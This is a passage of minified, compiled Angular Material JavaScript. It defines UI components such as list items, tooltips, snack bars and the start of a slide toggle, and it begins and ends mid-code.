.mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active .mat-list-option:hover,.cdk-high-contrast-active .mat-nav-list .mat-list-item:hover,.cdk-high-contrast-active mat-action-list .mat-list-item:hover{outline:dotted 1px;z-index:1}.cdk-high-contrast-active .mat-list-single-selected-option::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}.cdk-high-contrast-active [dir=rtl] .mat-list-single-selected-option::after{right:auto;left:16px}@media(hover: none){.mat-list-option:not(.mat-list-single-selected-option):not(.mat-list-item-disabled):hover,.mat-nav-list .mat-list-item:not(.mat-list-item-disabled):hover,.mat-action-list .mat-list-item:not(.mat-list-item-disabled):hover{background:none}}'],encapsulation:2,changeDetection:0}),t})(),$F=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-avatar",""],["","matListAvatar",""]],hostAttrs:[1,"mat-list-avatar"]}),t})(),Lr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-list-icon",""],["","matListIcon",""]],hostAttrs:[1,"mat-list-icon"]}),t})(),rc=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-subheader",""],["","matSubheader",""]],hostAttrs:[1,"mat-subheader"]}),t})(),is=(()=>{class t extends i1e{constructor(e,i,n,r){super(),this._element=e,this._isInteractiveList=!1,this._destroyed=new J,this._disabled=!1,this._isInteractiveList=!!(n||r&&"action-list"===r._getListType()),this._list=n||r;const c=this._getHostElement();"button"===c.nodeName.toLowerCase()&&!c.hasAttribute("type")&&c.setAttribute("type","button"),this._list&&this._list._stateChanges.pipe(ea(this._destroyed)).subscribe(()=>{i.markForCheck()})}get disabled(){return this._disabled||!(!this._list||!this._list.disabled)}set disabled(e){this._disabled=wi(e)}ngAfterContentInit(){!function MW(t,a,e="mat"){t.changes.pipe(Ro(t)).subscribe(({length:i})=>{eb(a,`${e}-2-line`,!1),eb(a,`${e}-3-line`,!1),eb(a,`${e}-multi-line`,!1),2===i||3===i?eb(a,`${e}-${i}-line`,!0):i>3&&eb(a,`${e}-multi-line`,!0)})}(this._lines,this._element)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_isRippleDisabled(){return!this._isInteractiveList||this.disableRipple||!(!this._list||!this._list.disableRipple)}_getHostElement(){return this._element.nativeElement}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(a1e,8),Ee(QF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list-item"],["a","mat-list-item",""],["button","mat-list-item",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,$F,5),fa(n,Lr,5),fa(n,Or,5)),2&e){let r;Vt(r=Bt())&&(i._avatar=r.first),Vt(r=Bt())&&(i._icon=r.first),Vt(r=Bt())&&(i._lines=r)}},hostAttrs:[1,"mat-list-item","mat-focus-indicator"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-list-item-disabled",i.disabled)("mat-list-item-with-avatar",i._avatar||i._icon)},inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matListItem"],features:[ci],ngContentSelectors:X0e,decls:6,vars:2,consts:[[1,"mat-list-item-content"],["mat-ripple","",1,"mat-list-item-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-list-text"]],template:function(e,i){1&e&&(Jn(K0e),m(0,"span",0),it(1,"span",1),va(2),m(3,"span",2),va(4,1),u(),va(5,2),u()),2&e&&(g(1),F("matRippleTrigger",i._getHostElement())("matRippleDisabled",i._isRippleDisabled()))},dependencies:[Dl],encapsulation:2,changeDetection:0}),t})(),XF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[vW,Od,la,Qw,rn,vW,la,Qw,u8]}),t})();const l1e=["tooltip"],YF="tooltip-panel",JF=ym({passive:!0}),ZF=new ni("mat-tooltip-scroll-strategy"),h1e={provide:ZF,deps:[As],useFactory:function u1e(t){return()=>t.scrollStrategies.reposition({scrollThrottle:20})}},f1e=new ni("mat-tooltip-default-options",{providedIn:"root",factory:function p1e(){return{showDelay:0,hideDelay:0,touchendHideDelay:1500}}});let _1e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._overlay=e,this._elementRef=i,this._scrollDispatcher=n,this._viewContainerRef=r,this._ngZone=c,this._platform=d,this._ariaDescriber=T,this._focusMonitor=k,this._dir=Y,this._defaultOptions=te,this._position="below",this._disabled=!1,this._viewInitialized=!1,this._pointerExitEventsInitialized=!1,this._viewportMargin=8,this._cssClassPrefix="mat",this._showDelay=this._defaultOptions.showDelay,this._hideDelay=this._defaultOptions.hideDelay,this.touchGestures="auto",this._message="",this._passiveListeners=[],this._destroyed=new J,this._scrollStrategy=q,this._document=pe,te&&(te.position&&(this.position=te.position),te.touchGestures&&(this.touchGestures=te.touchGestures)),Y.change.pipe(ea(this._destroyed)).subscribe(()=>{this._overlayRef&&this._updatePosition(this._overlayRef)})}get position(){return this._position}set position(e){var i;e!==this._position&&(this._position=e,this._overlayRef&&(this._updatePosition(this._overlayRef),null===(i=this._tooltipInstance)||void 0===i||i.show(0),this._overlayRef.updatePosition()))}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this.hide(0):this._setupPointerEnterEventsIfNeeded()}get showDelay(){return this._showDelay}set showDelay(e){this._showDelay=Uo(e)}get hideDelay(){return this._hideDelay}set hideDelay(e){this._hideDelay=Uo(e),this._tooltipInstance&&(this._tooltipInstance._mouseLeaveHideDelay=this._hideDelay)}get message(){return this._message}set message(e){this._ariaDescriber.removeDescription(this._elementRef.nativeElement,this._message,"tooltip"),this._message=null!=e?String(e).trim():"",!this._message&&this._isTooltipVisible()?this.hide(0):(this._setupPointerEnterEventsIfNeeded(),this._updateTooltipMessage(),this._ngZone.runOutsideAngular(()=>{Promise.resolve().then(()=>{this._ariaDescriber.describe(this._elementRef.nativeElement,this.message,"tooltip")})}))}get tooltipClass(){return this._tooltipClass}set tooltipClass(e){this._tooltipClass=e,this._tooltipInstance&&this._setTooltipClass(this._tooltipClass)}ngAfterViewInit(){this._viewInitialized=!0,this._setupPointerEnterEventsIfNeeded(),this._focusMonitor.monitor(this._elementRef).pipe(ea(this._destroyed)).subscribe(e=>{e?"keyboard"===e&&this._ngZone.run(()=>this.show()):this._ngZone.run(()=>this.hide(0))})}ngOnDestroy(){const e=this._elementRef.nativeElement;clearTimeout(this._touchstartTimeout),this._overlayRef&&(this._overlayRef.dispose(),this._tooltipInstance=null),this._passiveListeners.forEach(([i,n])=>{e.removeEventListener(i,n,JF)}),this._passiveListeners.length=0,this._destroyed.next(),this._destroyed.complete(),this._ariaDescriber.removeDescription(e,this.message,"tooltip"),this._focusMonitor.stopMonitoring(e)}show(e=this.showDelay){var i;if(this.disabled||!this.message||this._isTooltipVisible())return void(null===(i=this._tooltipInstance)||void 0===i||i._cancelPendingAnimations());const n=this._createOverlay();this._detach(),this._portal=this._portal||new hp(this._tooltipComponent,this._viewContainerRef);const r=this._tooltipInstance=n.attach(this._portal).instance;r._triggerElement=this._elementRef.nativeElement,r._mouseLeaveHideDelay=this._hideDelay,r.afterHidden().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._setTooltipClass(this._tooltipClass),this._updateTooltipMessage(),r.show(e)}hide(e=this.hideDelay){const i=this._tooltipInstance;i&&(i.isVisible()?i.hide(e):(i._cancelPendingAnimations(),this._detach()))}toggle(){this._isTooltipVisible()?this.hide():this.show()}_isTooltipVisible(){return!!this._tooltipInstance&&this._tooltipInstance.isVisible()}_createOverlay(){var e;if(this._overlayRef)return this._overlayRef;const i=this._scrollDispatcher.getAncestorScrollContainers(this._elementRef),n=this._overlay.position().flexibleConnectedTo(this._elementRef).withTransformOriginOn(`.${this._cssClassPrefix}-tooltip`).withFlexibleDimensions(!1).withViewportMargin(this._viewportMargin).withScrollableContainers(i);return n.positionChanges.pipe(ea(this._destroyed)).subscribe(r=>{this._updateCurrentPositionClass(r.connectionPair),this._tooltipInstance&&r.scrollableViewProperties.isOverlayClipped&&this._tooltipInstance.isVisible()&&this._ngZone.run(()=>this.hide(0))}),this._overlayRef=this._overlay.create({direction:this._dir,positionStrategy:n,panelClass:`${this._cssClassPrefix}-${YF}`,scrollStrategy:this._scrollStrategy()}),this._updatePosition(this._overlayRef),this._overlayRef.detachments().pipe(ea(this._destroyed)).subscribe(()=>this._detach()),this._overlayRef.outsidePointerEvents().pipe(ea(this._destroyed)).subscribe(()=>{var r;return null===(r=this._tooltipInstance)||void 0===r?void 0:r._handleBodyInteraction()}),this._overlayRef.keydownEvents().pipe(ea(this._destroyed)).subscribe(r=>{this._isTooltipVisible()&&27===r.keyCode&&!es(r)&&(r.preventDefault(),r.stopPropagation(),this._ngZone.run(()=>this.hide(0)))}),!(null===(e=this._defaultOptions)||void 0===e)&&e.disableTooltipInteractivity&&this._overlayRef.addPanelClass(`${this._cssClassPrefix}-tooltip-panel-non-interactive`),this._overlayRef}_detach(){this._overlayRef&&this._overlayRef.hasAttached()&&this._overlayRef.detach(),this._tooltipInstance=null}_updatePosition(e){const i=e.getConfig().positionStrategy,n=this._getOrigin(),r=this._getOverlayPosition();i.withPositions([this._addOffset(Object.assign(Object.assign({},n.main),r.main)),this._addOffset(Object.assign(Object.assign({},n.fallback),r.fallback))])}_addOffset(e){return e}_getOrigin(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i||"below"==i?n={originX:"center",originY:"above"==i?"top":"bottom"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={originX:"start",originY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={originX:"end",originY:"center"});const{x:r,y:c}=this._invertPosition(n.originX,n.originY);return{main:n,fallback:{originX:r,originY:c}}}_getOverlayPosition(){const e=!this._dir||"ltr"==this._dir.value,i=this.position;let n;"above"==i?n={overlayX:"center",overlayY:"bottom"}:"below"==i?n={overlayX:"center",overlayY:"top"}:"before"==i||"left"==i&&e||"right"==i&&!e?n={overlayX:"end",overlayY:"center"}:("after"==i||"right"==i&&e||"left"==i&&!e)&&(n={overlayX:"start",overlayY:"center"});const{x:r,y:c}=this._invertPosition(n.overlayX,n.overlayY);return{main:n,fallback:{overlayX:r,overlayY:c}}}_updateTooltipMessage(){this._tooltipInstance&&(this._tooltipInstance.message=this.message,this._tooltipInstance._markForCheck(),this._ngZone.onMicrotaskEmpty.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._tooltipInstance&&this._overlayRef.updatePosition()}))}_setTooltipClass(e){this._tooltipInstance&&(this._tooltipInstance.tooltipClass=e,this._tooltipInstance._markForCheck())}_invertPosition(e,i){return"above"===this.position||"below"===this.position?"top"===i?i="bottom":"bottom"===i&&(i="top"):"end"===e?e="start":"start"===e&&(e="end"),{x:e,y:i}}_updateCurrentPositionClass(e){const{overlayY:i,originX:n,originY:r}=e;let c;if(c="center"===i?this._dir&&"rtl"===this._dir.value?"end"===n?"left":"right":"start"===n?"left":"right":"bottom"===i&&"top"===r?"above":"below",c!==this._currentPosition){const d=this._overlayRef;if(d){const T=`${this._cssClassPrefix}-${YF}-`;d.removePanelClass(T+this._currentPosition),d.addPanelClass(T+c)}this._currentPosition=c}}_setupPointerEnterEventsIfNeeded(){this._disabled||!this.message||!this._viewInitialized||this._passiveListeners.length||(this._platformSupportsMouseEvents()?this._passiveListeners.push(["mouseenter",()=>{this._setupPointerExitEventsIfNeeded(),this.show()}]):"off"!==this.touchGestures&&(this._disableNativeGesturesIfNecessary(),this._passiveListeners.push(["touchstart",()=>{this._setupPointerExitEventsIfNeeded(),clearTimeout(this._touchstartTimeout),this._touchstartTimeout=setTimeout(()=>this.show(),500)}])),this._addListeners(this._passiveListeners))}_setupPointerExitEventsIfNeeded(){if(this._pointerExitEventsInitialized)return;this._pointerExitEventsInitialized=!0;const e=[];if(this._platformSupportsMouseEvents())e.push(["mouseleave",i=>{var n;const r=i.relatedTarget;(!r||null===(n=this._overlayRef)||void 0===n||!n.overlayElement.contains(r))&&this.hide()}],["wheel",i=>this._wheelListener(i)]);else if("off"!==this.touchGestures){this._disableNativeGesturesIfNecessary();const i=()=>{clearTimeout(this._touchstartTimeout),this.hide(this._defaultOptions.touchendHideDelay)};e.push(["touchend",i],["touchcancel",i])}this._addListeners(e),this._passiveListeners.push(...e)}_addListeners(e){e.forEach(([i,n])=>{this._elementRef.nativeElement.addEventListener(i,n,JF)})}_platformSupportsMouseEvents(){return!this._platform.IOS&&!this._platform.ANDROID}_wheelListener(e){if(this._isTooltipVisible()){const i=this._document.elementFromPoint(e.clientX,e.clientY),n=this._elementRef.nativeElement;i!==n&&!n.contains(i)&&this.hide()}}_disableNativeGesturesIfNecessary(){const e=this.touchGestures;if("off"!==e){const i=this._elementRef.nativeElement,n=i.style;("on"===e||"INPUT"!==i.nodeName&&"TEXTAREA"!==i.nodeName)&&(n.userSelect=n.msUserSelect=n.webkitUserSelect=n.MozUserSelect="none"),("on"===e||!i.draggable)&&(n.webkitUserDrag="none"),n.touchAction="none",n.webkitTapHighlightColor="transparent"}}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{position:["matTooltipPosition","position"],disabled:["matTooltipDisabled","disabled"],showDelay:["matTooltipShowDelay","showDelay"],hideDelay:["matTooltipHideDelay","hideDelay"],touchGestures:["matTooltipTouchGestures","touchGestures"],message:["matTooltip","message"],tooltipClass:["matTooltipClass","tooltipClass"]}}),t})(),Pa=(()=>{class t extends _1e{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){super(e,i,n,r,c,d,T,k,q,Y,te,pe),this._tooltipComponent=C1e}}return t.\u0275fac=function(e){return new(e||t)(Ee(As),Ee(mi),Ee(By),Ee(fo),Ee(qi),Ee(cr),Ee(Pw),Ee(js),Ee(ZF),Ee(Cr,8),Ee(f1e,8),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTooltip",""]],hostAttrs:[1,"mat-tooltip-trigger"],exportAs:["matTooltip"],features:[ci]}),t})(),g1e=(()=>{class t{constructor(e,i){this._changeDetectorRef=e,this._closeOnInteraction=!1,this._isVisible=!1,this._onHide=new J,this._animationsDisabled="NoopAnimations"===i}show(e){clearTimeout(this._hideTimeoutId),this._showTimeoutId=setTimeout(()=>{this._toggleVisibility(!0),this._showTimeoutId=void 0},e)}hide(e){clearTimeout(this._showTimeoutId),this._hideTimeoutId=setTimeout(()=>{this._toggleVisibility(!1),this._hideTimeoutId=void 0},e)}afterHidden(){return this._onHide}isVisible(){return this._isVisible}ngOnDestroy(){this._cancelPendingAnimations(),this._onHide.complete(),this._triggerElement=null}_handleBodyInteraction(){this._closeOnInteraction&&this.hide(0)}_markForCheck(){this._changeDetectorRef.markForCheck()}_handleMouseLeave({relatedTarget:e}){(!e||!this._triggerElement.contains(e))&&(this.isVisible()?this.hide(this._mouseLeaveHideDelay):this._finalizeAnimation(!1))}_onShow(){}_handleAnimationEnd({animationName:e}){(e===this._showAnimation||e===this._hideAnimation)&&this._finalizeAnimation(e===this._showAnimation)}_cancelPendingAnimations(){clearTimeout(this._showTimeoutId),clearTimeout(this._hideTimeoutId),this._showTimeoutId=this._hideTimeoutId=void 0}_finalizeAnimation(e){e?this._closeOnInteraction=!0:this.isVisible()||this._onHide.next()}_toggleVisibility(e){const i=this._tooltip.nativeElement,n=this._showAnimation,r=this._hideAnimation;if(i.classList.remove(e?r:n),i.classList.add(e?n:r),this._isVisible=e,e&&!this._animationsDisabled&&"function"==typeof getComputedStyle){const c=getComputedStyle(i);("0s"===c.getPropertyValue("animation-duration")||"none"===c.getPropertyValue("animation-name"))&&(this._animationsDisabled=!0)}e&&this._onShow(),this._animationsDisabled&&(i.classList.add("_mat-animation-noopable"),this._finalizeAnimation(e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(ar,8))},t.\u0275dir=Ot({type:t}),t})(),C1e=(()=>{class t extends g1e{constructor(e,i,n){super(e,n),this._breakpointObserver=i,this._isHandset=this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait), (max-width: 959.98px) and (orientation: landscape)"),this._showAnimation="mat-tooltip-show",this._hideAnimation="mat-tooltip-hide"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(O3),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tooltip-component"]],viewQuery:function(e,i){if(1&e&&Mi(l1e,7),2&e){let n;Vt(n=Bt())&&(i._tooltip=n.first)}},hostAttrs:["aria-hidden","true"],hostVars:2,hostBindings:function(e,i){1&e&&he("mouseleave",function(r){return i._handleMouseLeave(r)}),2&e&&ri("zoom",i.isVisible()?1:null)},features:[ci],decls:4,vars:6,consts:[[1,"mat-tooltip",3,"ngClass","animationend"],["tooltip",""]],template:function(e,i){if(1&e&&(m(0,"div",0,1),he("animationend",function(r){return i._handleAnimationEnd(r)}),oe(2,"async"),s(3),u()),2&e){let n;Ct("mat-tooltip-handset",null==(n=re(2,4,i._isHandset))?null:n.matches),F("ngClass",i.tooltipClass),g(3),ke(i.message)}},dependencies:[ig,Jv],styles:[".mat-tooltip{color:#fff;border-radius:4px;margin:14px;max-width:250px;padding-left:8px;padding-right:8px;overflow:hidden;text-overflow:ellipsis;transform:scale(0)}.mat-tooltip._mat-animation-noopable{animation:none;transform:scale(1)}.cdk-high-contrast-active .mat-tooltip{outline:solid 1px}.mat-tooltip-handset{margin:24px;padding-left:16px;padding-right:16px}.mat-tooltip-panel-non-interactive{pointer-events:none}@keyframes mat-tooltip-show{0%{opacity:0;transform:scale(0)}50%{opacity:.5;transform:scale(0.99)}100%{opacity:1;transform:scale(1)}}@keyframes mat-tooltip-hide{0%{opacity:1;transform:scale(1)}100%{opacity:0;transform:scale(1)}}.mat-tooltip-show{animation:mat-tooltip-show 200ms cubic-bezier(0, 0, 0.2, 1) forwards}.mat-tooltip-hide{animation:mat-tooltip-hide 100ms cubic-bezier(0, 0, 0.2, 1) forwards}"],encapsulation:2,changeDetection:0}),t})(),h8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[h1e],imports:[Xy,rn,bu,la,la,uu]}),t})();function y1e(t,a){if(1&t){const e=Ye();m(0,"div",2)(1,"button",3),he("click",function(){return be(e),Me(V().action())}),s(2),u()()}if(2&t){const e=V();g(2),ke(e.data.action)}}function b1e(t,a){}const eV=new ni("MatSnackBarData");class nA{constructor(){this.politeness="assertive",this.announcementMessage="",this.duration=0,this.data=null,this.horizontalPosition="center",this.verticalPosition="bottom"}}const M1e=Math.pow(2,31)-1;class f8{constructor(a,e){this._overlayRef=e,this._afterDismissed=new J,this._afterOpened=new J,this._onAction=new J,this._dismissedByAction=!1,this.containerInstance=a,a._onExit.subscribe(()=>this._finishDismiss())}dismiss(){this._afterDismissed.closed||this.containerInstance.exit(),clearTimeout(this._durationTimeoutId)}dismissWithAction(){this._onAction.closed||(this._dismissedByAction=!0,this._onAction.next(),this._onAction.complete(),this.dismiss()),clearTimeout(this._durationTimeoutId)}closeWithAction(){this.dismissWithAction()}_dismissAfter(a){this._durationTimeoutId=setTimeout(()=>this.dismiss(),Math.min(a,M1e))}_open(){this._afterOpened.closed||(this._afterOpened.next(),this._afterOpened.complete())}_finishDismiss(){this._overlayRef.dispose(),this._onAction.closed||this._onAction.complete(),this._afterDismissed.next({dismissedByAction:this._dismissedByAction}),this._afterDismissed.complete(),this._dismissedByAction=!1}afterDismissed(){return this._afterDismissed}afterOpened(){return this.containerInstance._onEnter}onAction(){return this._onAction}}let v1e=(()=>{class t{constructor(e,i){this.snackBarRef=e,this.data=i}action(){this.snackBarRef.dismissWithAction()}get hasAction(){return!!this.data.action}}return t.\u0275fac=function(e){return new(e||t)(Ee(f8),Ee(eV))},t.\u0275cmp=Wt({type:t,selectors:[["simple-snack-bar"]],hostAttrs:[1,"mat-simple-snackbar"],decls:3,vars:2,consts:[[1,"mat-simple-snack-bar-content"],["class","mat-simple-snackbar-action",4,"ngIf"],[1,"mat-simple-snackbar-action"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"span",0),s(1),u(),ne(2,y1e,3,1,"div",1)),2&e&&(g(1),ke(i.data.message),g(1),F("ngIf",i.hasAction))},dependencies:[Ri,da],styles:[".mat-simple-snackbar{display:flex;justify-content:space-between;align-items:center;line-height:20px;opacity:1}.mat-simple-snackbar-action{flex-shrink:0;margin:-8px -8px -8px 8px}.mat-simple-snackbar-action button{max-height:36px;min-width:0}[dir=rtl] .mat-simple-snackbar-action{margin-left:-8px;margin-right:8px}.mat-simple-snack-bar-content{overflow:hidden;text-overflow:ellipsis}"],encapsulation:2,changeDetection:0}),t})();const A1e={snackBarState:nr("state",[sn("void, hidden",zi({transform:"scale(0.8)",opacity:0})),sn("visible",zi({transform:"scale(1)",opacity:1})),gn("* => visible",En("150ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void, * => hidden",En("75ms cubic-bezier(0.4, 0.0, 1, 1)",zi({opacity:0})))])};let T1e=(()=>{class t extends eA{constructor(e,i,n,r,c){super(),this._ngZone=e,this._elementRef=i,this._changeDetectorRef=n,this._platform=r,this.snackBarConfig=c,this._announceDelay=150,this._destroyed=!1,this._onAnnounce=new J,this._onExit=new J,this._onEnter=new J,this._animationState="void",this.attachDomPortal=d=>{this._assertNotAttached();const T=this._portalOutlet.attachDomPortal(d);return this._afterPortalAttached(),T},this._live="assertive"!==c.politeness||c.announcementMessage?"off"===c.politeness?"off":"polite":"assertive",this._platform.FIREFOX&&("polite"===this._live&&(this._role="status"),"assertive"===this._live&&(this._role="alert"))}attachComponentPortal(e){this._assertNotAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._afterPortalAttached(),i}attachTemplatePortal(e){this._assertNotAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._afterPortalAttached(),i}onAnimationEnd(e){const{fromState:i,toState:n}=e;if(("void"===n&&"void"!==i||"hidden"===n)&&this._completeExit(),"visible"===n){const r=this._onEnter;this._ngZone.run(()=>{r.next(),r.complete()})}}enter(){this._destroyed||(this._animationState="visible",this._changeDetectorRef.detectChanges(),this._screenReaderAnnounce())}exit(){return this._ngZone.run(()=>{this._animationState="hidden",this._elementRef.nativeElement.setAttribute("mat-exit",""),clearTimeout(this._announceTimeoutId)}),this._onExit}ngOnDestroy(){this._destroyed=!0,this._completeExit()}_completeExit(){this._ngZone.onMicrotaskEmpty.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._onExit.next(),this._onExit.complete()})})}_afterPortalAttached(){const e=this._elementRef.nativeElement,i=this.snackBarConfig.panelClass;i&&(Array.isArray(i)?i.forEach(n=>e.classList.add(n)):e.classList.add(i))}_assertNotAttached(){this._portalOutlet.hasAttached()}_screenReaderAnnounce(){this._announceTimeoutId||this._ngZone.runOutsideAngular(()=>{this._announceTimeoutId=setTimeout(()=>{const e=this._elementRef.nativeElement.querySelector("[aria-hidden]"),i=this._elementRef.nativeElement.querySelector("[aria-live]");if(e&&i){let n=null;this._platform.isBrowser&&document.activeElement instanceof HTMLElement&&e.contains(document.activeElement)&&(n=document.activeElement),e.removeAttribute("aria-hidden"),i.appendChild(e),null==n||n.focus(),this._onAnnounce.next(),this._onAnnounce.complete()}},this._announceDelay)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(cr),Ee(nA))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},features:[ci]}),t})(),E1e=(()=>{class t extends T1e{_afterPortalAttached(){super._afterPortalAttached(),"center"===this.snackBarConfig.horizontalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-center"),"top"===this.snackBarConfig.verticalPosition&&this._elementRef.nativeElement.classList.add("mat-snack-bar-top")}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["snack-bar-container"]],hostAttrs:[1,"mat-snack-bar-container"],hostVars:1,hostBindings:function(e,i){1&e&&GC("@state.done",function(r){return i.onAnimationEnd(r)}),2&e&&s1("@state",i._animationState)},features:[ci],decls:3,vars:2,consts:[["aria-hidden","true"],["cdkPortalOutlet",""]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,b1e,0,0,"ng-template",1),u(),it(2,"div")),2&e&&(g(2),Rt("aria-live",i._live)("role",i._role))},dependencies:[Cu],styles:[".mat-snack-bar-container{border-radius:4px;box-sizing:border-box;display:block;margin:24px;max-width:33vw;min-width:344px;padding:14px 16px;min-height:48px;transform-origin:center}.cdk-high-contrast-active .mat-snack-bar-container{border:solid 1px}.mat-snack-bar-handset{width:100%}.mat-snack-bar-handset .mat-snack-bar-container{margin:8px;max-width:100%;min-width:0;width:100%}"],encapsulation:2,data:{animation:[A1e.snackBarState]}}),t})(),p8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[bu,yu,rn,up,la,la]}),t})();const tV=new ni("mat-snack-bar-default-options",{providedIn:"root",factory:function D1e(){return new nA}});let x1e=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._live=i,this._injector=n,this._breakpointObserver=r,this._parentSnackBar=c,this._defaultConfig=d,this._snackBarRefAtThisLevel=null}get _openedSnackBarRef(){const e=this._parentSnackBar;return e?e._openedSnackBarRef:this._snackBarRefAtThisLevel}set _openedSnackBarRef(e){this._parentSnackBar?this._parentSnackBar._openedSnackBarRef=e:this._snackBarRefAtThisLevel=e}openFromComponent(e,i){return this._attach(e,i)}openFromTemplate(e,i){return this._attach(e,i)}open(e,i="",n){const r=Object.assign(Object.assign({},this._defaultConfig),n);return r.data={message:e,action:i},r.announcementMessage===e&&(r.announcementMessage=void 0),this.openFromComponent(this.simpleSnackBarComponent,r)}dismiss(){this._openedSnackBarRef&&this._openedSnackBarRef.dismiss()}ngOnDestroy(){this._snackBarRefAtThisLevel&&this._snackBarRefAtThisLevel.dismiss()}_attachSnackBarContainer(e,i){const r=Ko.create({parent:i&&i.viewContainerRef&&i.viewContainerRef.injector||this._injector,providers:[{provide:nA,useValue:i}]}),c=new hp(this.snackBarContainerComponent,i.viewContainerRef,r),d=e.attach(c);return d.instance.snackBarConfig=i,d.instance}_attach(e,i){const n=Object.assign(Object.assign(Object.assign({},new nA),this._defaultConfig),i),r=this._createOverlay(n),c=this._attachSnackBarContainer(r,n),d=new f8(c,r);if(e instanceof ho){const T=new Mm(e,null,{$implicit:n.data,snackBarRef:d});d.instance=c.attachTemplatePortal(T)}else{const T=this._createInjector(n,d),k=new hp(e,void 0,T),q=c.attachComponentPortal(k);d.instance=q.instance}return this._breakpointObserver.observe("(max-width: 599.98px) and (orientation: portrait)").pipe(ea(r.detachments())).subscribe(T=>{r.overlayElement.classList.toggle(this.handsetCssClass,T.matches)}),n.announcementMessage&&c._onAnnounce.subscribe(()=>{this._live.announce(n.announcementMessage,n.politeness)}),this._animateSnackBar(d,n),this._openedSnackBarRef=d,this._openedSnackBarRef}_animateSnackBar(e,i){e.afterDismissed().subscribe(()=>{this._openedSnackBarRef==e&&(this._openedSnackBarRef=null),i.announcementMessage&&this._live.clear()}),this._openedSnackBarRef?(this._openedSnackBarRef.afterDismissed().subscribe(()=>{e.containerInstance.enter()}),this._openedSnackBarRef.dismiss()):e.containerInstance.enter(),i.duration&&i.duration>0&&e.afterOpened().subscribe(()=>e._dismissAfter(i.duration))}_createOverlay(e){const i=new yg;i.direction=e.direction;let n=this._overlay.position().global();const r="rtl"===e.direction,c="left"===e.horizontalPosition||"start"===e.horizontalPosition&&!r||"end"===e.horizontalPosition&&r,d=!c&&"center"!==e.horizontalPosition;return c?n.left("0"):d?n.right("0"):n.centerHorizontally(),"top"===e.verticalPosition?n.top("0"):n.bottom("0"),i.positionStrategy=n,this._overlay.create(i)}_createInjector(e,i){return Ko.create({parent:e&&e.viewContainerRef&&e.viewContainerRef.injector||this._injector,providers:[{provide:f8,useValue:i},{provide:eV,useValue:e.data}]})}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),w1e=(()=>{class t extends x1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d),this.simpleSnackBarComponent=v1e,this.snackBarContainerComponent=E1e,this.handsetCssClass="mat-snack-bar-handset"}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Nw),At(Ko),At(O3),At(t,12),At(tV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:p8}),t})();const I1e=["input"],R1e=function(t){return{enterDuration:t}},S1e=["*"],k1e=new ni("mat-slide-toggle-default-options",{providedIn:"root",factory:()=>({disableToggleValue:!1})});let P1e=0;const O1e={provide:Ls,useExisting:ja(()=>Mg),multi:!0};class N1e{constructor(a,e){this.source=a,this.checked=e}}const L1e=dp(Pd(El(Zc(class{constructor(t){this._elementRef=t}}))));let z1e=(()=>{class t extends L1e{constructor(e,i,n,r,c,d,T){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this.defaults=c,this._onChange=k=>{},this._onTouched=()=>{},this._required=!1,this._checked=!1,this.name=null,this.labelPosition="after",this.ariaLabel=null,this.ariaLabelledby=null,this.change=new Tt,this.toggleChange=new 